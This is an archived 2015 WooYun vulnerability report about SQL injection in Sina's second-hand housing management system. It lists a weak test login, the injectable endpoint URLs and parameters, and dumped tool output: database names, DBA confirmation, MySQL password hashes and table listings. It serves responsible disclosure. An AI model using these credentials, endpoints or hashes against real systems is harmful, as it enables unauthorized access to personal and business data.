乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-08-20: 细节已通知厂商并且等待厂商处理中 2015-08-21: 厂商已经确认,细节仅向厂商公开 2015-08-31: 细节向核心白帽子及相关领域专家公开 2015-09-10: 细节向普通白帽子公开 2015-09-20: 细节向实习白帽子公开 2015-10-05: 细节向公众公开
SQL注射
新浪二手房运营管理系统http://opt.op.esf.sina.com.cn/首先,弱口令:
账号:test密码:123456
进去一看,测试账号,似乎没啥用:
仔细一看,全是注入点,列举几个,其余请厂商自查:
接口:http://opt.op.esf.sina.com.cn/hotdot/findcode参数:phone
接口:http://opt.op.esf.sina.com.cn/company/all参数:所有参数
接口:http://opt.op.esf.sina.com.cn/company/communityall参数:所有参数
数据库 147个:
web application technology: Apache 2, PHP 5.2.14back-end DBMS: MySQL 5.0.12available databases [147]:[*] admin_esf_leju_com[*] bargain_esf_leju_com[*] db_backup_esf[*] house_refresh_bozhou[*] house_refresh_cangzhou[*] house_refresh_chaohu[*] house_refresh_chuzhou[*] house_refresh_cz[*] house_refresh_datong[*] house_refresh_dg[*] house_refresh_fs[*] house_refresh_fushun[*] house_refresh_gg[*] house_refresh_gl[*] house_refresh_gy[*] house_refresh_gz[*] house_refresh_gz_opt[*] house_refresh_haikou[*] house_refresh_hhht[*] house_refresh_huangshan[*] house_refresh_huizhou[*] house_refresh_hz[*] house_refresh_jiangmen[*] house_refresh_jinzhong[*] house_refresh_klmy[*] house_refresh_km[*] house_refresh_ks[*] house_refresh_lanzhou[*] house_refresh_liuzhou[*] house_refresh_luoyang[*] house_refresh_lw[*] house_refresh_nb[*] house_refresh_nn[*] house_refresh_nt[*] house_refresh_pzh[*] house_refresh_qhd[*] house_refresh_quanzhou[*] house_refresh_sanya[*] house_refresh_suzh[*] house_refresh_sz[*] house_refresh_tangshan[*] house_refresh_tongling[*] house_refresh_ty[*] house_refresh_weifang[*] house_refresh_weihai[*] house_refresh_wh[*] house_refresh_wuhu[*] house_refresh_wx[*] house_refresh_xian[*] house_refresh_xm[*] house_refresh_xz[*] house_refresh_yangjiang[*] house_refresh_yangzhou[*] house_refresh_yichang[*] house_refresh_yuncheng[*] house_refresh_zb[*] house_refresh_zhongshan[*] house_refresh_zhuhai[*] house_refresh_zjk[*] house_refresh_zz[*] information_schema[*] memory_esf_leju_com[*] memory_esf_leju_com_opt[*] mobile_esf_leju_com[*] mobile_esf_leju_com_140304bak[*] mysql[*] performance_schema[*] shop_admin[*] shop_admin_opt[*] shop_bozhou[*] shop_cangzhou[*] shop_cc[*] shop_cd[*] shop_chaohu[*] shop_chuzhou[*] shop_cq[*] shop_cs[*] shop_cz[*] shop_datong[*] shop_dg[*] shop_dl[*] shop_fs[*] shop_fushun[*] shop_fz[*] shop_gg[*] shop_gl[*] shop_gy[*] shop_gz[*] shop_gz_opt[*] shop_haikou[*] shop_heb[*] shop_hf[*] shop_hhht[*] shop_hk[*] shop_huangshan[*] shop_huizhou[*] shop_hz[*] shop_jiangmen[*] shop_jinzhong[*] shop_jn[*] shop_klmy[*] shop_km[*] shop_ks[*] shop_lanzhou[*] shop_liuzhou[*] shop_luoyang[*] shop_lw[*] shop_mem[*] shop_nb[*] shop_nc[*] shop_nj[*] shop_nn[*] shop_nt[*] shop_pzh[*] shop_qd[*] shop_qhd[*] shop_quanzhou[*] shop_sanya[*] shop_sjz[*] shop_suzh[*] shop_suzhou[*] shop_sy[*] shop_sz[*] shop_tangshan[*] shop_tongling[*] shop_ty[*] shop_weifang[*] shop_weihai[*] shop_wh[*] shop_wuhu[*] shop_wx[*] shop_xian[*] shop_xm[*] shop_xz[*] shop_yangjiang[*] shop_yangzhou[*] shop_yichang[*] shop_yt[*] shop_yuncheng[*] shop_zb[*] shop_zhengzhou[*] shop_zhongshan[*] shop_zhuhai[*] shop_zjk[*] shop_zz[*] test[*] tongji
DBA权限:
web application technology: Apache 2, PHP 5.2.14back-end DBMS: MySQL 5.0.12current user is DBA: Truedatabase management system users password hashes:[*] esfleju [2]: password hash: *67B391353B0793496FB597708CAFE0F95C68F74D password hash: *970DF458E2CEFFCE24AD3C53F121306A7E145DDE[*] esfuser [1]: password hash: *970DF458E2CEFFCE24AD3C53F121306A7E145DDE[*] lejuuser [1]: password hash: *079C6845550CCB18A943CB85165C96F5A0292A27[*] monitor [1]: password hash: *2ABD94A7D02AFD760C6F9A7CDE115E6100C4B5B4[*] root [1]: password hash: *8A83A5DEE3B1BC84E2B3FCA9370E705F57163510[*] ssc [1]: password hash: *31BB83A3CB336C9405B3E5D0EF413F21A7309C31[*] sunshicun2011 [1]: password hash: *F8AE15F683F3AA8793A6CC0651283DCB6E6B4D23[*] test [1]: password hash: *23AE809DDACAF96AF0FD78ED04B6A265E05AA257[*] tmpuser_leju [1]: password hash: *C22098F8D9F48CAF8CEACB53574843D2599D7173[*] zuhouse [1]: password hash: *0953AAB6E4353661949A7EA65876631CA55BC178
随便找个库跑下表:
Database: mobile_esf_leju_com[197 tables]+----------------------------------+| black_user || fj_admin_users || fj_apply_log || fj_certificate || fj_error_correction || fj_exam_time || fj_exam_type || fj_express || fj_moni_options || fj_my_certificate || fj_my_exam_answer || fj_my_exam_log || fj_my_moni_answer || fj_my_moni_log || fj_my_practice_answer || fj_my_practice_log || fj_my_questions || fj_my_section_answer || fj_my_section_log || fj_my_video_log || fj_option_pic_data || fj_option_pic_data_copy || fj_options || fj_order || fj_paper || fj_paper_questions || fj_questions || fj_sections || fj_user_pay || fj_user_work_history || fj_users || fj_video || fn_admingoldlog || fn_adminpermission || fn_adminrole || fn_adminrole_permission || fn_adminuser || fn_adminuser_role || fn_authtoken || fn_bankcard || fn_beelog || fn_black_mobile || fn_black_user || fn_blackwhiteuser || fn_chargprocess || fn_china_city || fn_china_district || fn_china_province || fn_clientimg || fn_communitydata || fn_communityindex || fn_contacts || fn_continuousloginawards || fn_coupon || fn_customer_201344 || fn_customer_201345 || fn_customer_201346 || fn_customer_201347 || fn_customer_201348 || fn_customer_201349 || fn_customer_201350 || fn_customer_201351 || fn_customer_201352 || fn_customer_201401 || fn_customer_201402 || fn_customer_201403 || fn_customer_201404 || fn_customer_201405 || fn_customer_201406 || fn_customer_201407 || fn_customer_201408 || fn_customer_201409 || fn_customer_201410 || fn_customer_201411 || fn_customer_201412 || fn_customer_201413 || fn_customer_201414 || fn_customer_201418 || fn_customer_201419 || fn_customer_201420 || fn_customer_201421 || fn_customer_201422 || fn_customer_201423 || fn_customer_201424 || fn_customer_201426 || fn_customer_201427 || fn_customer_201428 || fn_customer_201429 || fn_customer_201430 || fn_customer_400 || fn_customer_getlogs || fn_customer_lock || fn_dblog || fn_dealhouse || fn_error_log || fn_esf_sendlog || fn_esfhouse_logs || fn_esfhouse_start_logs || fn_esfhouse_stat || fn_expend || fn_expend_bak || fn_extract || fn_extract_count || fn_fnjuser || fn_friend || fn_gold_log || fn_gold_order || fn_group_address || fn_group_content || fn_group_information || fn_group_member || fn_home || fn_home400_sendlogs || fn_home_agentmain || fn_housedata || fn_houseindex || fn_housepv || fn_houseshow || fn_houseuser || fn_huodong || fn_huodong_money_flow || fn_huodong_user_whitelist || fn_huodong_user_whitelist_log || fn_importusererrorlog || fn_incomeflow || fn_incomeflow_tmp || fn_invite || fn_invite_bak || fn_invite_bak1 || fn_login_area || fn_login_logs || fn_loginip || fn_merge_log || fn_message || fn_mytask || fn_notify || fn_pay_logs || fn_pay_order || fn_perday_click || fn_perday_log || fn_picture || fn_point_log || fn_private_content || fn_private_msg || fn_recharge_count || fn_redpackethousinglink || fn_redpackethousinglinklog || fn_rewardflow || fn_rule_log || fn_rushlog || fn_shop_promote || fn_shpushinterfacelog || fn_spstatistics || fn_statistics_agent || fn_statistics_company || fn_statistics_invite || fn_statistics_shop || fn_statisticvoucher || fn_subphone || fn_sysaccess || fn_syscompany || fn_syscompany_shop || fn_sysgroup || fn_sysgroup_access || fn_sysmsg || fn_sysresource || fn_sysuser || fn_sysuser_city || fn_sysuser_group || fn_talklog || fn_talklog_bak || fn_tasks || fn_template || fn_user || fn_user_bak || fn_user_cnt || fn_user_ids || fn_user_subphone || fn_user_subphone_line || fn_user_subphone_log || fn_user_weimi || fn_user_yiqiso || fn_userinvite || fn_userlimits || fn_wallet || fn_wb_info || fn_wb_user || fn_weixin_community || fn_weixin_hongbao || fn_weixin_hongbao_log || fn_weixin_hongbao_tmp || fn_weixin_hongbao_user_whitelist || fn_weixin_user || fn_weixin_user_blacklist || fn_wminfo || test_api || touch_index_reflink |+----------------------------------+
随便找个表记录条数 600多万(目测是深圳房源数据):
Database: house_refresh_sz+------------------+---------+| Table | Entries |+------------------+---------+| sp_house_refresh | 6141012 |+------------------+---------+
测试,点到为止,未下载任何数据。
你们更专业。
危害等级:低
漏洞Rank:5
确认时间:2015-08-21 09:21
感谢支持,已转给合作方处理
暂无